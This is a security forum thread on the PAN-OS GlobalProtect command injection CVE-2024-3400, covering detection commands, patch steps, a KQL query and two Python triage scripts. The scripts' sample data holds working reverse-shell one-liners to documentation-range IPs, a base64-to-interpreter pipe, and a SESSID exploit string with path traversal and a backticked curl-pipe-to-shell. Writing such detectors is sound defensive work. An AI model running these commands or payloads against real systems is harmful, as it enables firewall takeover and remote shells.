
CVE-2024-3400: Palo Alto PAN-OS command injection — analysis and detection

SecurityTrainer_Rosa 5/17/2025

CVE-2024-3400 — Critical command injection in Palo Alto GlobalProtect gateway (CVSS 10.0).

What happened

Unauthenticated attackers could execute arbitrary commands on the firewall via a crafted request to the GlobalProtect portal. The vulnerability was in the session handling for GlobalProtect's SESSID cookie.

Why it matters

  • Firewalls are trusted perimeter devices. Owning a firewall = owning the network.
  • Palo Alto firewalls are in ~30% of enterprise networks.
  • This was exploited in the wild before a patch was available.

Detection

Check for suspicious files in the GlobalProtect cache:

find /opt/panlogs/tmp/device_telemetry/hour/ -name "*.css" -exec ls -la {} \;

Look for unexpected cron entries:

crontab -l
cat /etc/cron.d/*

Mitigation

  1. Patch immediately (PAN-OS 10.2.9-h1, 11.0.4-h1, 11.1.2-h3)
  2. Apply Threat Prevention signature (Threat ID 95187)
  3. If unable to patch, disable GlobalProtect device telemetry as a temporary workaround
EDR_Engineer_Raj 5/17/2025

We found indicators on 2 of our client firewalls. The attacker dropped a Python reverse shell into the cron. Patch AND check for persistence. Patching alone doesn't remove the backdoor.
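Worked example for the cron check in the opening post and the cron-resident reverse shell Raj describes. This is added code, not from the thread or from Palo Alto: it parses crontab-format text and flags entries that look like reverse shells or decoded payloads piped into an interpreter. The sample crontab is constructed, and the indicator regexes are assumed heuristics for common one-liners, not published IOCs for this CVE.

```python
"""Triage crontab-format text for reverse-shell style persistence.

Added example, not code from the original thread. Runs over constructed
crontab text; the suspicious patterns are assumptions based on common
reverse-shell one-liners, not indicators published for CVE-2024-3400.
"""
import re
from typing import List, Tuple

# Constructed crontab content (not taken from a real device).
SAMPLE_CRONTAB = """\
# m h dom mon dow command
0 * * * * /usr/bin/logrotate /etc/logrotate.conf
*/5 * * * * /usr/bin/python3 -c 'import socket,subprocess,os;s=socket.socket();s.connect(("192.0.2.10",4444));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);subprocess.call(["/bin/sh","-i"])'
30 2 * * * /bin/bash -c 'bash -i >& /dev/tcp/198.51.100.7/443 0>&1'
*/10 * * * * echo aW1wb3J0IG9z | base64 -d | /usr/bin/python3
15 3 * * 0 /opt/scripts/backup.sh
"""

# Each indicator: (name, compiled regex). Assumed heuristics, not vendor IOCs.
INDICATORS: List[Tuple[str, re.Pattern]] = [
    ("python socket reverse shell",
     re.compile(r"python\d?(\.\d+)?\s+-c\s+.*socket\.socket", re.I)),
    ("bash /dev/tcp reverse shell",
     re.compile(r"/dev/(tcp|udp)/\d{1,3}(\.\d{1,3}){3}/\d+")),
    ("base64-decoded payload piped to interpreter",
     re.compile(r"base64\s+(-d|--decode)\s*\|\s*\S*(python|perl|sh|bash)", re.I)),
    ("netcat with shell",
     re.compile(r"\bnc\b.*\s-e\s+/bin/(ba)?sh", re.I)),
]


def parse_crontab(text: str) -> List[Tuple[str, str]]:
    """Return (schedule, command) pairs, skipping comments, blanks and VAR=value lines."""
    entries = []
    for line in text.splitlines():
        line = line.strip()
        if not line or line.startswith("#"):
            continue
        if re.match(r"^[A-Za-z_][A-Za-z0-9_]*=", line):  # environment assignment
            continue
        parts = line.split(None, 5)
        if line.startswith("@"):  # @reboot, @hourly ... form
            sched, cmd = parts[0], " ".join(parts[1:])
        elif len(parts) == 6:  # five schedule fields plus the command
            sched, cmd = " ".join(parts[:5]), parts[5]
        else:
            continue  # malformed line; a real triage tool would log it
        entries.append((sched, cmd))
    return entries


def flag_suspicious(text: str) -> List[Tuple[str, str, str]]:
    """Return (schedule, command, indicator) for every entry matching an indicator."""
    hits = []
    for sched, cmd in parse_crontab(text):
        for name, pattern in INDICATORS:
            if pattern.search(cmd):
                hits.append((sched, cmd, name))
                break  # one finding per entry is enough for triage
    return hits


if __name__ == "__main__":
    for sched, cmd, name in flag_suspicious(SAMPLE_CRONTAB):
        print(f"[{name}] {sched} -> {cmd[:60]}")
```

On a real appliance you would feed this the output of `crontab -l` and the files under /etc/cron.d; the point is that the schedule and command are separated before matching, so a benign comment mentioning "socket" or an environment line does not trigger a finding.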

PhishFighter_Amy 5/18/2025

For Sentinel/KQL detection of exploitation attempts:

CommonSecurityLog
| where DeviceVendor == "Palo Alto Networks"
| where Activity contains "globalprotect"
| where RequestURL contains "SESSID" and RequestURL matches regex @"\x00"
| project TimeGenerated, SourceIP, RequestURL
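The same detection idea as Amy's KQL, run offline over sample web-access log lines so the indicators can be checked without a Sentinel workspace. This is an added example, not code from the thread or from Palo Alto. The log line format (remote IP, timestamp, request, status, and the Cookie header in quotes) and all sample lines are constructed; the SESSID traversal-plus-backtick shape follows public write-ups of the exploit chain, but the exact request format an attacker sends is an assumption here.

```python
"""Scan access-log lines for CVE-2024-3400-style SESSID cookie abuse.

Added example, not code from the original thread or from Palo Alto. The log
format and the sample lines are constructed; the indicators cover path
traversal into the device telemetry directory, shell metacharacters in the
cookie value, and the NUL byte Amy's KQL looks for (raw or logged as \\x00).
"""
import re
from typing import Dict, List, Optional

# Constructed sample lines: remote IP, timestamp, request, status, Cookie header.
SAMPLE_LOG = r"""
203.0.113.5 [17/Apr/2024:10:01:02 +0000] "GET /global-protect/login.esp HTTP/1.1" 200 "SESSID=8f2c7ab91d3e4c5f; PHPSESSID=abc"
203.0.113.9 [17/Apr/2024:10:02:11 +0000] "POST /ssl-vpn/hipreport.esp HTTP/1.1" 200 "SESSID=/../../../opt/panlogs/tmp/device_telemetry/minute/probe123"
203.0.113.9 [17/Apr/2024:10:02:40 +0000] "POST /ssl-vpn/hipreport.esp HTTP/1.1" 200 "SESSID=/../../../opt/panlogs/tmp/device_telemetry/minute/`curl${IFS}198.51.100.7/x|sh`"
198.51.100.20 [17/Apr/2024:10:03:00 +0000] "GET /global-protect/portal/css/login.css HTTP/1.1" 200 "SESSID=\x00abc"
203.0.113.7 [17/Apr/2024:10:04:00 +0000] "GET /global-protect/login.esp HTTP/1.1" 200 "-"
"""

LINE_RE = re.compile(
    r'^(?P<ip>\S+) \[(?P<ts>[^\]]+)\] "(?P<req>[^"]*)" (?P<status>\d{3}) "(?P<cookie>[^"]*)"$'
)

# Indicator name and regex applied to the SESSID value only (assumed heuristics).
INDICATORS = [
    ("path traversal in SESSID", re.compile(r"\.\./|\.\.\\")),
    ("telemetry directory targeted", re.compile(r"/opt/panlogs/tmp/device_telemetry/")),
    ("shell metacharacters (command injection attempt)", re.compile(r"`|\$\(|\$\{IFS\}|\|")),
    ("embedded NUL byte", re.compile(r"\x00|\\x00")),  # raw NUL or the escaped form
]


def parse_line(line: str) -> Optional[Dict[str, str]]:
    """Split one constructed-format log line into named fields, or None if it does not parse."""
    m = LINE_RE.match(line.strip())
    return m.groupdict() if m else None


def sessid_value(cookie_header: str) -> Optional[str]:
    """Pull the SESSID value out of a Cookie header; None if absent (or header is '-')."""
    for part in cookie_header.split(";"):
        name, _, value = part.strip().partition("=")
        if name == "SESSID":
            return value
    return None


def classify(sessid: str) -> List[str]:
    """Return the names of every indicator that matches the SESSID value."""
    return [name for name, pattern in INDICATORS if pattern.search(sessid)]


def scan(log_text: str) -> List[Dict[str, object]]:
    """Return one finding record per line whose SESSID value matches an indicator."""
    findings = []
    for raw in log_text.splitlines():
        if not raw.strip():
            continue
        fields = parse_line(raw)
        if fields is None:
            continue  # unparseable line; production code would count these
        sessid = sessid_value(fields["cookie"])
        if sessid is None:
            continue
        hits = classify(sessid)
        if hits:
            findings.append({"ip": fields["ip"], "ts": fields["ts"],
                             "req": fields["req"], "sessid": sessid, "findings": hits})
    return findings


if __name__ == "__main__":
    for f in scan(SAMPLE_LOG):
        print(f"{f['ip']} {f['req']} -> {', '.join(f['findings'])}")
```

Matching on the cookie value rather than the whole line is the point: a legitimate SESSID is an opaque token, so any traversal sequence, telemetry path, backtick or `$(` in it is a finding on its own, and the NUL-byte check catches the case Amy's query targets whether the log stores the raw byte or its escaped form.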
ZeroDayHunter 5/20/2025

This is why zero trust matters. Even if your firewall is compromised, if you're not relying on the firewall for all access control, the blast radius is limited. Lateral movement should be blocked by microsegmentation.


Thread Stats

Created 5/17/2025
Last Active 5/19/2025
Replies 3
Views 4,818